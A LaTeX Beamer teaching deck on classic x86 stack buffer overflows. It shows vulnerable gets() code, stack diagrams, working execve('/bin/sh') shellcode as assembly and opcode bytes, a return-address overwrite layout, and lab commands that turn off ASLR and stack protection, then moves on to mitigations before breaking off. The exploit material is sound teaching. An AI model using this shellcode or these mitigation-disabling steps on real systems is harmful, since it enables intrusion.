\documentclass[aspectratio=169]{beamer}

\usepackage{listings}
\usepackage{tikz}

\usetheme{carpenter}

\usetikzlibrary{positioning}

\title{Smashing Software Security 0x41414141 for fun and...oh no, not again!}
\subtitle{Welcome to 1996}

\lstdefinestyle{carpenterASM}
{
language = [x86masm]Assembler,
    basicstyle = {\ttfamily \color{white}},
    backgroundcolor = {\color{carpenterblue}},
    stringstyle = {\color{purple}},
    numberstyle = {\color{pink}},
    keywordstyle = {\color{carpenterpink}},
    keywordstyle = [2]{\color{carpenterpink}},
    keywordstyle = [3]{\color{yellow}},
    keywordstyle = [4]{\color{teal}},
    otherkeywords = {;,++,uint32_t},
    morekeywords = [2]{;},
    morekeywords = [3]{<<<, ==>},
    morekeywords = [4]{++},
}

\lstdefinestyle{carpenterC}
{
    language = C,
    basicstyle = {\ttfamily \color{white}},
    backgroundcolor = {\color{carpenterblue}},
    stringstyle = {\color{purple}},
    numberstyle = {\color{pink}},
    keywordstyle = {\color{carpenterpink}},
    keywordstyle = [2]{\color{carpenterpink}},
    keywordstyle = [3]{\color{yellow}},
    keywordstyle = [4]{\color{teal}},
    otherkeywords = {;,<<,>>,++,uint32_t},
    morekeywords = [2]{;},
    morekeywords = [3]{<<, >>},
    morekeywords = [4]{++},
}

\lstdefinestyle{carpenterCsmall}
{
    language = C,
    basicstyle = {\ttfamily \footnotesize \color{white}},
    backgroundcolor = {\color{carpenterblue}},
    stringstyle = {\color{purple}},
    numberstyle = {\color{pink}},
    keywordstyle = {\color{carpenterpink}},
    keywordstyle = [2]{\color{carpenterpink}},
    keywordstyle = [3]{\color{yellow}},
    keywordstyle = [4]{\color{teal}},
    otherkeywords = {;,<<,>>,++,uint32_t},
    morekeywords = [2]{;},
    morekeywords = [3]{<<, >>},
    morekeywords = [4]{++},
}

\lstdefinestyle{carpenterBASH}
{
    language = bash,
    basicstyle = {\ttfamily \color{white}},
    backgroundcolor = {\color{carpenterblue}},
    stringstyle = {\color{purple}},
    numberstyle = {\color{pink}},
    keywordstyle = {\color{carpenterpink}},
    keywordstyle = [2]{\color{carpenterpink}},
    keywordstyle = [3]{\color{yellow}},
    keywordstyle = [4]{\color{teal}},
    otherkeywords = {;,<<,>>,++,uint32_t},
    morekeywords = [2]{;},
    morekeywords = [3]{<<, >>},
    morekeywords = [4]{++},
}

\begin{document}
\begin{frame}
    \titlepage
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{SMASHING THE STACK FOR FUN AND PROFIT}
    It all started in 1996 with the article from
    \texttt{Aleph One}.\\
    \url{http://phrack.org/issues/49/14.html#article}\\
    We will reproduce the examples in this paper using a 32bit x86
    machine with no mitigations.\\
    \begin{center}
        \includegraphics[scale=.7]{stacksmash}
    \end{center}
\end{frame}

% Ripasso layout di memoria
\begin{frame}
    \frametitle{STACK}
    \begin{itemize}
        \item The stack is the memory location where automatic variables get
    allocated (the \texttt{local} variables that are not manually
    allocated with \texttt{malloc(3)}).  The state of the function
    calls is placed on the stack.

        \item In x86 we have different \texttt{Calling conventions}, depending
            on the operating system.

        \item The stack (in x86!) grows in the opposite direction of the memory addresses.
    \end{itemize}

\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{BUFFER OVERFLOW}

    \begin{minipage}{.49\textwidth}
    C Code
    \begin{lstlisting}[style=carpenterC]
uint32_t a;
unsigned char b[4];
    \end{lstlisting}

    ASM
    \begin{lstlisting}[style=carpenterASM]
sub    esp,0x8
    \end{lstlisting}
    \end{minipage}
    \begin{minipage}{.5\textwidth}
        \begin{figure}
            \centering
            \begin{tikzpicture}
                \node[draw, minimum width=3cm, minimum height=.5cm] (a) {a};
                \node[draw, minimum width=3cm, minimum height=.5cm, below=0cm of a] (b) {b};
            \end{tikzpicture}
        \end{figure}
    \end{minipage}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{BUFFER OVERFLOW}

    \begin{minipage}{.49\textwidth}
    C Code
    \begin{lstlisting}[style=carpenterC]
int foo(int _) { }
foo(a);
    \end{lstlisting}

    ASM
    \begin{lstlisting}[style=carpenterASM]
call   foo
    \end{lstlisting}
    \end{minipage}
    \begin{minipage}{.5\textwidth}
        \begin{figure}
            \centering
            \begin{tikzpicture}
                \node[draw, minimum width=4cm, minimum height=.5cm] (d) {Local parameters};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of d] (c) {Return address};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of c] (b) {Saved state};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of b] (a) {Local variables};
            \end{tikzpicture}
        \end{figure}
    \end{minipage}
\end{frame}

% Memory corruptions
\begin{frame}[containsverbatim]
    \frametitle{VULNERABLE CODE}
    \begin{minipage}{.49\textwidth}
    C Code
    \begin{lstlisting}[style=carpenterC]
int foo(int _) {
    char e[4];

    gets(e);
    return 0;
}
    \end{lstlisting}
    \end{minipage}
    \begin{minipage}{.49\textwidth}
        {\texttt
Never use gets().  Because it is impossible to tell without knowing the
data  in  advance  how  many  characters  gets() will read, and because
gets() will continue to store characters past the end of the buffer, it
is extremely dangerous to use.  It has been used to break computer
        security.  Use fgets() instead.}
    \end{minipage}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{BUFFER OVERFLOW}

    \begin{minipage}{.49\textwidth}
    C Code
    \begin{lstlisting}[style=carpenterC]
int foo(int _) {
       uint32_t ok;
       char action[4];
       char p[4];

       gets(pass);
       ok = !strcmp(p, "123");
       // Get the action
==>    gets(action);
       if (ok)
              Privileged
       return 0;
}
    \end{lstlisting}

    \end{minipage}
    \begin{minipage}{.5\textwidth}
        \begin{figure}
            \centering
            \begin{tikzpicture}
                \node[draw, minimum width=4cm, minimum height=.5cm] (a) {Local parameters};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of a] (b) {Return address};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of b] (c) {Saved State};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of c] (d) {ok = 0};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of d] (e) {action};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of e] (3) {A A A};
            \end{tikzpicture}
        \end{figure}
    \end{minipage}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{BUFFER OVERFLOW}

    \begin{minipage}{.49\textwidth}
    C Code
    \begin{lstlisting}[style=carpenterC]
int foo(int _) {
       uint32_t ok;
       char action[4];
       char p[4];

       gets(pass);
       ok = !strcmp(p, "123");
       // Get the action
==>    gets(action);
       if (ok)
              Privileged
       return 0;
}
    \end{lstlisting}

    \end{minipage}
    \begin{minipage}{.5\textwidth}
        \begin{figure}
            \centering
            \begin{tikzpicture}
                \node[draw, minimum width=4cm, minimum height=.5cm] (a) {Local parameters};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of a] (b) {Return address};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of b] (c) {Saved State};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of c] (d) {ok = 0};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of d] (3) {B B B B};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of e] (3) {A A A};
            \end{tikzpicture}
        \end{figure}
    \end{minipage}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{BUFFER OVERFLOW}

    \begin{minipage}{.49\textwidth}
    C Code
    \begin{lstlisting}[style=carpenterC]
int foo(int _) {
       uint32_t ok;
       char action[4];
       char p[4];

       gets(pass);
       ok = !strcmp(p, "123");
       // Get the action
==>    gets(action);
       if (ok)
              Privileged
       return 0;
}
    \end{lstlisting}

    \end{minipage}
    \begin{minipage}{.5\textwidth}
        \begin{figure}
            \centering
            \begin{tikzpicture}
                \node[draw, minimum width=4cm, minimum height=.5cm] (a) {Local parameters};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of a] (b) {Return address};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of b] (c) {Saved State};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of c] (3) {B};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of d] (3) {B B B B};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of e] (3) {A A A};
            \end{tikzpicture}
        \end{figure}
    \end{minipage}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{BUFFER OVERFLOW}

    \begin{minipage}{.49\textwidth}
    C Code
    \begin{lstlisting}[style=carpenterC]
int foo(int _) {
       uint32_t ok;
       char action[4];
       char p[4];

       gets(pass);
       ok = !strcmp(p, "123");
       // Get the action
       gets(action);
       if (ok)
==>           Privileged
       return 0;
}
    \end{lstlisting}

    \end{minipage}
    \begin{minipage}{.5\textwidth}
        \begin{figure}
            \centering
            \begin{tikzpicture}
                \node[draw, minimum width=4cm, minimum height=.5cm] (a) {Local parameters};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of a] (b) {Return address};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of b] (c) {Saved State};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of c] (3) {B};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of d] (3) {B B B B};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of e] (3) {A A A};
            \end{tikzpicture}
        \end{figure}
    \end{minipage}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{BUFFER OVERFLOW}

    \begin{minipage}{.49\textwidth}
    C Code
    \begin{lstlisting}[style=carpenterC]
int foo(int _) {
    uint32_t a;
    uint32_t b;
    uint32_t c;
    uint32_t d;
    char e[4];

==>    gets(e);
    return 0;
}
    \end{lstlisting}

    \end{minipage}
    \begin{minipage}{.5\textwidth}
        \begin{figure}
            \centering
            \begin{tikzpicture}
                \node[draw, minimum width=4cm, minimum height=.5cm] (a) {Local parameters};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of a] (b) {Return address};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of b] (c) {Saved State};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of c] (d) {a};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of d] (b) {b};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of b] (1) {c};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of 1] (2) {d};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of 2] (3) {e};
            \end{tikzpicture}
        \end{figure}
    \end{minipage}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{BUFFER OVERFLOW}

    \begin{minipage}{.49\textwidth}
    C Code
    \begin{lstlisting}[style=carpenterC]
int foo(int _) {
    uint32_t a;
    uint32_t b;
    uint32_t c;
    uint32_t d;
    char e[4];

==>    gets(e);
    return 0;
}
    \end{lstlisting}

    \end{minipage}
    \begin{minipage}{.5\textwidth}
        \begin{figure}
            \centering
            \begin{tikzpicture}
                \node[draw, minimum width=4cm, minimum height=.5cm] (a) {Local parameters};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of a] (b) {Return address};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of b] (c) {Saved State};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of c] (d) {a};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of d] (b) {b};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of b] (1) {c};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of 1] (2) {d};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of 2] (3) {A A A A};
            \end{tikzpicture}
        \end{figure}
    \end{minipage}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{BUFFER OVERFLOW}

    \begin{minipage}{.49\textwidth}
    C Code
    \begin{lstlisting}[style=carpenterC]
int foo(int _) {
    uint32_t a;
    uint32_t b;
    uint32_t c;
    uint32_t d;
    char e[4];

==>    gets(e);
    return 0;
}
    \end{lstlisting}

    \end{minipage}
    \begin{minipage}{.5\textwidth}
        \begin{figure}
            \centering
            \begin{tikzpicture}
                \node[draw, minimum width=4cm, minimum height=.5cm] (a) {Local parameters};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of a] (b) {Return address};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of b] (c) {Saved State};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of c] (d) {a};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of d] (b) {b};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of b] (1) {c};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of 1] (2) {A A A A};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of 2] (3) {A A A A};
            \end{tikzpicture}
        \end{figure}
    \end{minipage}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{BUFFER OVERFLOW}

    \begin{minipage}{.49\textwidth}
    C Code
    \begin{lstlisting}[style=carpenterC]
int foo(int _) {
    uint32_t a;
    uint32_t b;
    uint32_t c;
    uint32_t d;
    char e[4];

==>    gets(e);
    return 0;
}
    \end{lstlisting}

    \end{minipage}
    \begin{minipage}{.5\textwidth}
        \begin{figure}
            \centering
            \begin{tikzpicture}
                \node[draw, minimum width=4cm, minimum height=.5cm] (a) {Local parameters};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of a] (b) {Return address};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of b] (c) {Saved State};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of c] (d) {a};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of d] (b) {b};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of b] (1) {A A A A};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of 1] (2) {A A A A};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of 2] (3) {A A A A};
            \end{tikzpicture}
        \end{figure}
    \end{minipage}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{BUFFER OVERFLOW}

    \begin{minipage}{.49\textwidth}
    C Code
    \begin{lstlisting}[style=carpenterC]
int foo(int _) {
    uint32_t a;
    uint32_t b;
    uint32_t c;
    uint32_t d;
    char e[4];

==>    gets(e);
    return 0;
}
    \end{lstlisting}

    \end{minipage}
    \begin{minipage}{.5\textwidth}
        \begin{figure}
            \centering
            \begin{tikzpicture}
                \node[draw, minimum width=4cm, minimum height=.5cm] (a) {Local parameters};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of a] (b) {Return address};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of b] (c) {Saved State};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of c] (d) {a};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of d] (b) {A A A A};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of b] (1) {A A A A};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of 1] (2) {A A A A};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of 2] (3) {A A A A};
            \end{tikzpicture}
        \end{figure}
    \end{minipage}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{BUFFER OVERFLOW}

    \begin{minipage}{.49\textwidth}
    C Code
    \begin{lstlisting}[style=carpenterC]
int foo(int _) {
    uint32_t a;
    uint32_t b;
    uint32_t c;
    uint32_t d;
    char e[4];

==>    gets(e);
    return 0;
}
    \end{lstlisting}

    \end{minipage}
    \begin{minipage}{.5\textwidth}
        \begin{figure}
            \centering
            \begin{tikzpicture}
                \node[draw, minimum width=4cm, minimum height=.5cm] (a) {Local parameters};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of a] (b) {Return address};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of b] (c) {Saved State};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of c] (d) {A A A A};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of d] (b) {A A A A};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of b] (1) {A A A A};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of 1] (2) {A A A A};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of 2] (3) {A A A A};
            \end{tikzpicture}
        \end{figure}
    \end{minipage}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{BUFFER OVERFLOW}

    \begin{minipage}{.49\textwidth}
    C Code
    \begin{lstlisting}[style=carpenterC]
int foo(int _) {
    uint32_t a;
    uint32_t b;
    uint32_t c;
    uint32_t d;
    char e[4];

==>    gets(e);
    return 0;
}
    \end{lstlisting}

    \end{minipage}
    \begin{minipage}{.5\textwidth}
        \begin{figure}
            \centering
            \begin{tikzpicture}
                \node[draw, minimum width=4cm, minimum height=.5cm] (a) {Local parameters};
                \node[draw, minimum width=4cm, minimum height=.5cm, below=0cm of a] (b) {Return address};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of b] (c) {A A A A};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of c] (d) {A A A A};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of d] (b) {A A A A};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of b] (1) {A A A A};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of 1] (2) {A A A A};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of 2] (3) {A A A A};
            \end{tikzpicture}
        \end{figure}
    \end{minipage}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{BUFFER OVERFLOW}

    \begin{minipage}{.49\textwidth}
    C Code
    \begin{lstlisting}[style=carpenterC]
int foo(int _) {
    uint32_t a;
    uint32_t b;
    uint32_t c;
    uint32_t d;
    char e[4];

==>    gets(e);
    return 0;
}
    \end{lstlisting}

    \end{minipage}
    \begin{minipage}{.5\textwidth}
        \begin{figure}
            \centering
            \begin{tikzpicture}
                \node[draw, minimum width=4cm, minimum height=.5cm] (a) {Local parameters};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of a] (b) {A A A A};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of b] (c) {A A A A};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of c] (d) {A A A A};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of d] (b) {A A A A};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of b] (1) {A A A A};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of 1] (2) {A A A A};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of 2] (3) {A A A A};
            \end{tikzpicture}
        \end{figure}
    \end{minipage}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{BUFFER OVERFLOW}

    \begin{minipage}{.49\textwidth}
    C Code
    \begin{lstlisting}[style=carpenterC]
int foo(int _) {
    uint32_t a;
    uint32_t b;
    uint32_t c;
    uint32_t d;
    char e[4];

    gets(e);
==>    return 0;
}
    \end{lstlisting}

    \end{minipage}
    \begin{minipage}{.5\textwidth}
        \begin{figure}
            \centering
            \begin{tikzpicture}
                \node[draw, minimum width=4cm, minimum height=.5cm] (a) {Local parameters};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of a] (b) {A A A A};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of b] (c) {A A A A};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of c] (d) {A A A A};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of d] (b) {A A A A};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of b] (1) {A A A A};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of 1] (2) {A A A A};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of 2] (3) {A A A A};
            \end{tikzpicture}
        \end{figure}
    \end{minipage}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{BUFFER OVERFLOW}

    Not feeling your smartest today? Have a
    segfault.\footnote{\url{https://wiki.theory.org/index.php/YourLanguageSucks}}

    \begin{lstlisting}[style=carpenterBASH]
~ % gcc
~ % gdb -q ./test
Reading symbols from ./test...(no debugging symbols found)
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/vagrant/test
AAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
    \end{lstlisting}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{BUFFER OVERFLOW: SHELLCODE}
    \begin{lstlisting}[style=carpenterASM]
xor eax,eax                ; 
cdq                        ;
push eax                   ; push 0
push 0x68732f2f            ; 
push 0x6e69622f            ; 
mov ebx,esp                ; 
push eax                   ;
push ebx                   ; push "/bin/sh\0"
mov ecx, esp               ; push &"/bin/sh\0"
mov al,0x0b                ; systemcall(execve)
int 80h                    ; systemcall(execve, "/bin/sh",
                           ;            &["/bin/sh", NULL])
    \end{lstlisting}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{BUFFER OVERFLOW: COMPILED SHELLCODE}
    The previous shellcode is the compiled version of the following
    C code.
    \begin{lstlisting}[style=carpenterC]
char *cmd[] = { "/bin/sh", NULL };
execve(*cmd, cmd);
    \end{lstlisting}
    If we extract the OPCODES from the assembly we get the following
    values:
    \begin{lstlisting}[style=carpenterC]
0x31 0xc0 0x99 0x50
0x68 0x2f 0x2f 0x73
0x68 0x68 0x2f 0x62
0x69 0x6e 0x89 0xe3
0x50 0x53 0x89 0xe1
0xb0 0x0b 0xcd 0x80
    \end{lstlisting}
\end{frame}


\begin{frame}[containsverbatim]
    \frametitle{BUFFER OVERFLOW: CODE EXECUTION}

    \begin{minipage}{.49\textwidth}
    C Code
    \begin{lstlisting}[style=carpenterC]
int foo(int _) {
    uint32_t a;
    uint32_t b;
    uint32_t c;
    uint32_t d;
    char e[4];

    gets(e);
==>    return 0;
}
    \end{lstlisting}

    \end{minipage}
    \begin{minipage}{.5\textwidth}
        \begin{figure}
            \centering
            \begin{tikzpicture}
                \node[draw, minimum width=4cm, minimum height=.5cm] (a) {Local parameters};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of a] (b) {? ? ? ?};
                \node[left=.5cm of b] (baseleft) {};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of b] (c) {0x31 0xc0 0x99 0x50};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of c] (d) {0x68 0x2f 0x2f 0x73};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of d] (e) {0x68 0x68 0x2f 0x62};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of e] (1) {0x69 0x6e 0x89 0xe3};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of 1] (2) {0x50 0x53 0x89 0xe1};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of 2] (3) {0xb0 0x0b 0xcd 0x80};
                \node[left=.5cm of 3] (endleft) {};
                \draw[white, thick, ->] (b) -- (baseleft.center) -- (endleft.center) -- (3);
            \end{tikzpicture}
        \end{figure}
    \end{minipage}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{BUFFER OVERFLOW: TESTBED}
    \begin{lstlisting}[style=carpenterBASH]
$ mkdir 32bit
$ cd 32bit
$ vagrant init ubuntu/trusty32
$ vagrant ssh
$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
$ gcc -o test -z execstack -fno-stack-protector test.c
    \end{lstlisting}
    \begin{center}
    \includegraphics[width=.50\textwidth]{1996}
    \end{center}
    
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{BUFFER OVERFLOW: TESTBED}
    \begin{lstlisting}[style=carpenterBASH]
~ % gdb -q ./test
(gdb) b foo
Breakpoint 1 at 0x8048423
(gdb) r
Starting program: /home/vagrant/test 
Breakpoint 1, 0x08048423 in foo ()
(gdb) p $esp
$1 = (void *) 0xbffff6e0
    \end{lstlisting}
    \begin{center}
    \includegraphics[width=.50\textwidth]{1996}
    \end{center}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{BUFFER OVERFLOW: CODE EXECUTION}

    \begin{minipage}{.49\textwidth}
    C Code
    \begin{lstlisting}[style=carpenterC]
int foo(int _) {
    uint32_t a;
    uint32_t b;
    uint32_t c;
    uint32_t d;
    char e[4];

    gets(e);
==>    return 0;
}
    \end{lstlisting}

    \end{minipage}
    \begin{minipage}{.5\textwidth}
        \begin{figure}
            \centering
            \begin{tikzpicture}
                \node[draw, minimum width=4cm, minimum height=.5cm] (a) {Local parameters};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of a] (b) { 0xbffff6XX };
                \node[left=.5cm of b] (baseleft) {};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of b] (c) {0x31 0xc0 0x99 0x50};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of c] (d) {0x68 0x2f 0x2f 0x73};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of d] (e) {0x68 0x68 0x2f 0x62};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of e] (1) {0x69 0x6e 0x89 0xe3};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of 1] (2) {0x50 0x53 0x89 0xe1};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of 2] (3) {0xb0 0x0b 0xcd 0x80};
                \node[left=.5cm of 3] (endleft) {};
                \draw[white, thick, ->] (b) -- (baseleft.center) -- (endleft.center) -- (3);
            \end{tikzpicture}
        \end{figure}
    \end{minipage}
\end{frame}

% Mitigations
\begin{frame}[containsverbatim]
    \frametitle{BUFFER OVERFLOW: BAD CHARS}
    C Code
    \begin{lstlisting}[style=carpenterC]
char x[10] = {};
gets(x);
for (int i = 0; i < 10; ++i)
   printf("%02x ", x[i]);
    \end{lstlisting}
    If we run this program we have:
    \begin{lstlisting}[style=carpenterBASH]
~ % perl -e 'print "AAAA\x43BBBB"' | /tmp/test
41 41 41 41 43 42 42 42 42 00
~ % perl -e 'print "AAAA\x0aBBBB"' | /tmp/test
41 41 41 41 00 00 00 00 00 00
    \end{lstlisting}
    That's because the \texttt{0x0a} character is the newline char,
    so our \texttt{BBBB} won't get loaded in the variable!
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{MITIGATIONS: STACK CANARIES}
    \begin{minipage}{.49\textwidth}
    C Code
    \begin{lstlisting}[style=carpenterC]
int foo(int _) {
  uint32_t canary;
  char e[4];

  gets(e);
  if (canary != 0xff0d0a00)
    exit(1);
  return 0;
}
    \end{lstlisting}

    \end{minipage}
    \begin{minipage}{.5\textwidth}
        \begin{figure}
            \centering
            \begin{tikzpicture}
                \node[draw, minimum width=4cm, minimum height=.5cm] (a) {Local parameters};
                \node[draw, minimum width=4cm, minimum height=.5cm,below=0cm of a] (b) {Return address};
                \node[draw, minimum width=4cm, minimum height=.5cm,below=0cm of b] (c) {Saved State};
                \node[draw, minimum width=4cm, minimum height=.5cm,below=0cm of c] (d) {Canary};
                \node[white, fill=carpenterblue, minimum width=4cm, minimum height=.5cm, below=0cm of d] (3) {A A A A};
            \end{tikzpicture}
        \end{figure}
    \end{minipage}
    \begin{itemize}
        \item Terminator canaries, which contains the most
            common bad chars;
        \item Random canaries, randomized for every program
            invocation.
    \end{itemize}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{MITIGATIONS: AUTHENTICATED POINTERS}
    On some architectures (ARM 8.3) the various pointers can be
    authenticated, therefore all the pointers\footnote{not only the
    return pointer!} can be encrypted with a random secret key and
    then decrypted only by the system.

    \begin{figure}
        \centering
        \begin{tikzpicture}
            \node[draw, minimum width=5cm, minimum height=.5cm] (a) {Local parameters};
            \node[draw, minimum width=5cm, minimum height=.5cm,below=0cm of a] (b) {$AES_{enc}(K,Return address)$};
            \node[draw, minimum width=5cm, minimum height=.5cm,below=0cm of b] (c) {Saved State};
            \node[white, fill=carpenterblue, minimum width=5cm, minimum height=.5cm, below=0cm of b] (3) {A A A A};
        \end{tikzpicture}
    \end{figure}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{MITIGATIONS: NON EXECUTABLE STACK}
    \begin{itemize}
        \item What if the stack was not executable?
        \item PaX patch suite.
        \item Can be disabled at compilation time using
            \texttt{-zexecstack}
    \end{itemize}

\begin{lstlisting}[style=carpenterBASH]
~ % checksec --output csv -f $(which ping) \
    | awk -F , '{print $3}'
NX enabled
\end{lstlisting}
\end{frame}

\begin{frame}[containsverbatim]
    \frametitle{MITIGATIONS: ASLR}
